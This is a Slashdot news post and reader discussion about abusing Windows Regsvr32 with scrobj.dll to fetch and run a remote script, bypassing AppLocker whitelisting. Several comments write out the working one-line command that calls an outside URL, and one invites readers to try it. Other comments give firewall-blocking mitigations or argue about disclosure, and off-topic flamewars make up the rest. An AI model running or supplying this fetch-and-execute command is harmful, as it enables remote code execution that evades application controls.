Core Windows Utility Can Be Used To Bypass Whitelisting

Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said.The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.

Privately?

[Frosty Piss]

A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft.

Re:

[Anonymous Coward]

They ignored it, so it became less private.

Re:

[Anonymous Coward]

No. They didn't issue a patch within 2 hours, so he went public.

windows_firewall-create_rule-regsvr32:block-done

[Anonymous Coward]

easy.

A flaw but

[the_Bionic_lemming]

Don't all browsers have url javascript shut off by default?

Re:

[the_Bionic_lemming]

Actually, I know firefox does.

I don't use IE and will never use chrome, so I was just asking.

Real issue is whitelist bypass

[Virtucon]

You need to run regsvr32 with admin rights anyway. If you're dumb enough to register an unsafe/unknown component you deserve to get hacked.

Re:Real issue is whitelist bypass

[Anonymous Coward]

The real issue is that regsvr32 understands URL's:

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Running this tells Windows to fetch an XML file from the internet, which tells it to run cmd.exe. The magic here is that if you change cmd.exe for any program outside the AppLocker whitelist, bingo: it will start, in theory. regsvr32 is part of the operating system and can be used to register and unregister COM script files with the Windows Registry. /s tells regsvr32 to be silent, /n tells it not to use DllRegisterServer, /i passes an optional parameter (our URL) to DLLinstall, /u means we're trying to unregister an object, and scrobj.dll is Microsoft's Script Component Runtime.

Nope

[The MAZZTer]

regsvr32 does not understand DLLs. scrobj.dll does... the contents of the /i switch are passed in to the DLL. Looks like the DLL is the one with the problem.Documentation [microsoft.com]

I expect most admins can simply block or remove the DLL with little impact on their system unless they are running some obscure program that requires it. Or, as another user suggested, firewall regsvr32 so it can't download files.

Re:Real issue is whitelist bypass

[Charles Werbick]

This exploit does not need admin rights. I just tried it. the request for admin rights only happens when a DLL is registered/unregistered. The flag /n prevents DLLRegisterServer from being used which defers the permission check.

The real trick here is that regsrvr32.dll will take a URL instead of a file as a script. No one had tried that before.

(Scared me enough I made a new firewall rule blocking outbound connections from regsrvr32.dll.)

Anyone who wants to try the proof-of-concept just open a command prompt and enter (from the article) -

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Re:

[Charles Werbick]

This isn't about gaining remote access to the system. This is about elevating access you already have.

Being able to use RegSrvr32.dll to bypass AppLocker provides arbitrary code execution without leaving any trace of it on the file system. Combine it with other vulnerabilities and you're cooking with gas!

Re:

[foradoxium]

can a driveby not run this command? That's what I find concerning. To your point, if someone is running this on the box you are already hosed. But if something from a website is able to run this on a user's box, without admin rights and quietly, this is a concern.

Re:

[account_deleted]

Comment removed based on user account deletion

Re:

[citizenr]

Just tried it and my firewall http://www.binisoft.org/wfc.ph... [binisoft.org] (default: deny all outgoing/incoming) gave me a nice popup asking if I want to allow it.

Disable Advertising

[U2xhc2hkb3QgU3Vja3M]

The Disable Advertising checkbox does not work.

Re:

[JustAnotherOldGuy]

The Disable Advertising checkbox does not work.

The "Install Adblock" checkbox seems to work, though.

Bit9?

[darrellg1]

I would think this can bypass Bit9 as well, since regsvr32 is a common windows component and allowed. Anyone got a different opinion?

Easy Fix - No Patch Required

[Mr.Intel]

It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block

Re:

[davor_p]

Do not forget Wow64 version of the executable in %SystemRoot%\SysWOW64 directory on 64-bit systems:

New-NetFirewallRule -DisplayName "Block Regsvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
New-NetFirewallRule -DisplayName "Block Regsvr32 Wow64" -Program "%SystemRoot%\SysWOW64\regsvr32.exe" -Direction Outbound -Action Block

(do try to run this from PowerShell with admin rights as well)

I'd laugh

[JustAnotherOldGuy]

I'd laugh, except the regular "exploit du jour" thing just isn't funny any more.

Honestly, Windows has more holes than a Chinese whorehouse. Is it ever going to be a secure operating system?

Re:

[Megol]

Standard operating systems have a lot of surface to exploit. The real question is if there will ever be a secure operating system, I'm not sure given the expectations of users. Still could be a _lot_ better...

RTFM: AppLocker

[clovis]

So basically the guy hat wrote the article had not read the TechNet article that Microsoft wrote about AppLocker's restrictions.
https://technet.microsoft.com/... [microsoft.com]

AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocke

Re:

[Sarten-X]

Looks like you didn't read TFA.

The exploit is that regsvr32 can download a script from the Internet and execute it. If that script launches an executable that AppLocker should block, teh executable will launch anyway.

In short, not only is a single command all that's necessary to download a malware kit from the Internet and run it, the kit can be a simple (and locally untraceable) way to get around AppLocker restrictions.

Re:

[clovis]

I did read the article, and understand the attack.
The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

If users can run cmd prompts and regsvr32, then you're hosed anyway.
If you want to prevent misuse of regsvr32, cmd prompts and tools like that, you use Group Policy.

Re:

[whoever57]

The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

Basically, what you are saying is that Applocker is designed to be ineffective.

Re:

[clovis]

The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

Basically, what you are saying is that Applocker is designed to be ineffective.

Lol, good one, but no.

AppLocker does what it is supposed to do, and it does not do what it says it can't do. But you would not know that unless you read the documentation.
AppLocker documentation specifically says it does not protect against something like regsv32r's newly discovered behavior.

AppLockers purpose is to simplify software restriction policies and it's useful for that.
If you have to create the images for 1,000 workstations, and only 500 of them have licensing for Microsoft office, 150 have licens

Re:

[whoever57]

Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

I never claimed that it was an anti-malware tool.

Re:

[clovis]

Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

I never claimed that it was an anti-malware tool.

From the documentation:

AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.

Again:

You must thoroughly examine each application before allowing them to run by using AppLocker rules.

Do users need to be running regsvr32? No, they do not. You block it using AppLocker just like you block regedit.exe and sol.exe

Also, if you go to the trouble is implementing something AppLocker, you don't let users open cmd prompts or run bat files. No ordinary user should be able to type in anything like "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll" and run it if you have control of the corporate systems.

Full disclosure: we don't use AppLocker where I work, but we us

So much for responsible disclosure.

[nuckfuts]

I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.

Re:

[guruevi]

According to the summary, the researcher did disclose this to Microsoft and they probably didn't respond. This is really a one-day patch kind of thing. Responsible disclosure is only invented by the corporations like Microsoft so they don't have to react quickly to a bug and it's reasonable to expect that the NSA is involved as well so they have a window to exploit the bug.

After the push to responsible disclosure by Microsoft, their products suddenly got "safer". I say disclose, God knows how many bugs Micr

Re:

[chispito]

I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.

It's a post-compromise application whitelisting bypass, of which there are other techniques. I don't think this is quite what you think it is.

Seems simple?

[jon3k]

Soooo...remove execute permission for the binary from everyone but administrators? Problem solved?

Re:

[Joe_Dragon]

as long as that does not mess up some apps / background stuff / updates and so on.

Easy fix?

[U2xhc2hkb3QgU3Vja3M]

Can't you just rename the damn file to something else?

Alex Ionescu

[iampiti]

...This is a guy that participated in the development of ReactOS. It seems he's pretty smart. A pity he abandoned the project. It really needs people like him.

Re:

[guruevi]

But can you run the above as root without having sudo privileges? The exploit is that anyone, even a browser can execute the code.

Summary misleading, not really a vulnerability

[cookd]

The Register article has a bit more information. This isn't really a vulnerability. It's definitely not "remote code execution". It works like this:

- Microsoft provides a tool called AppLocker that can be used to limit the programs that can be run on a system.
- The AppLocker tool is not intended as a tight "security boundary". Instead, it is a way to implement company policies like "no playing games at work", or to help with software licensing, i.e. "the company system image has a copy of Photoshop, but you

Re:

[Anonymous Coward]

Meh, it still wouldn't get past my firewall.

Re:

[beastofburdon]

If your firewall is on your router I will agree with you, but it you are talking about the firewall on Windows, then you are seriously mistaken.

Re:

[beastofburdon]

Good to hear. I need to get mine setup here soon before I get too many more "security patches" that fuck up my Win7 install. In fact I just need to set it to a very small whitelist for windows machines while leaving it open for Linux. I'm not sure how I'm going to do that yet though. Maybe set blocking by IP address and have static IP's?

Re:

[beastofburdon]

MAC won't work, I'm dual booting on all my machines. I'm leaning towards IP.

Re:

[mlw4428]

My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM. Are you spoofing your MACs under Linux or something? I'm assuming your firewall is a router or other separate hardware appliance.

Re:

[NatasRevol]

MACs are burned into the network controller's ROM.

LOL. Never played with VMware, have you? What would you like your MAC to be? I'll type it in for you if it's not autoassigned.

Re:

[mlw4428]

Well he said dual booting, not running VMs. I don't tend to consider running a VM as "dual booting", but I suppose that's just semantics. As for MAC: DEFACEDBABE1 was always fun (I remembered that from some website I no longer recall).

Re:

[beastofburdon]

What? I was saying that blocking only Windows would not work by blocking by MAC address because I am dual booting on all my machines. I intend to block at the router level(ddwrt) by IP address and setting separate static IP addresses for Windows and Linux on all the machines.

The final goal is to only allow access to sites required for gaming when in Win7 with the possibility of a few others to support gaming like nexusmods.com

Re:

[sexconker]

My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM..

MACs have been editable on consumer shit for ages. My old ass nForce 2 chipset from 2002 had an option to define the MAC via the BIOS and via the driver, for example.
Any NIC supporting virtual interfaces (such as for VLANs) will do the same thing.
Then you've got VMs.
Then you've got the fact that my physical interfaces are many (2 wireless, 2 wired on my main box), so even if I want to stick with the default MAC I've got 4 to handle.

Re:

[LichtSpektren]

Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".

Re:Not surprised

[myowntrueself]

Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".

Redhat used illicit monopolist tactics to force systemd on the rest of the Linux community

*ducks*

Re:

[BadDreamer]

The stable ABI is what created most of the mess in Windows. Listing this as a shortcoming of Linux shows you have no idea what you're talking about. A huge mass of badly maintained binary only drivers is not a good thing, it's an incredible liability.

Drivers need to be maintained. The only way to ensure that is to have their maintenance be part of the kernel maintenance. A stable ABI would directly counteract this.

And Microsoft keeps doing transgressions. They haven't washed out their stripes. They've just

Re:

[Killall -9 Bash]

New Windows is part of a clever master plan. When people reject this disgusting new flavor, MS starts selling Windows Classic. In glass bottles. Made with real sugar.

Re:

[Megol]

Okay so by posting that we know that you are immature at least intellectually, that you don't know the definition of malware - in fact being so far from the definition that you most likely have no clue about computers or programming.

The start of this sub-thread is ludicrous, no it isn't a back door for Microsoft to use. Know why? Us that actually knows what a computer is can check such things, maybe you'll learn about it when you grow up.

Re:

[Anonymous Coward]

Hilariously wrong. regsvr has been in every release of Windows since at least Windows 95 and it might have even been in 3.1. Back when "back doors" were just a twinkle in Ronald Reagan's eye.

It was basically Microsoft's first hit off the crack pipe otherwise known as COM.

Re:

[beastofburdon]

That means nothing at all. Why would you think Micro$oft wasn't thinking about taking control over the OS in 95?

Re:

[Megol]

Are you serious? If they wanted to take control of the OS they could have done it without crappy hacks - AS THEY FUCKING WROTE THE FUCKING SYSTEM!

Re:

[beastofburdon]

What do you mean with "crappy hacks"? Unless you are referring to the OS as a whole I do not know what you are talking about. I am talking about a backdoor built into the OS.

Re:

[beastofburdon]

How do you know that this is the only function? Do you have the source code? Can you compile it yourself and compare it to the stock binary?
I didn't think so.

Re:

[freeze128]

Windows System File checker will put that back.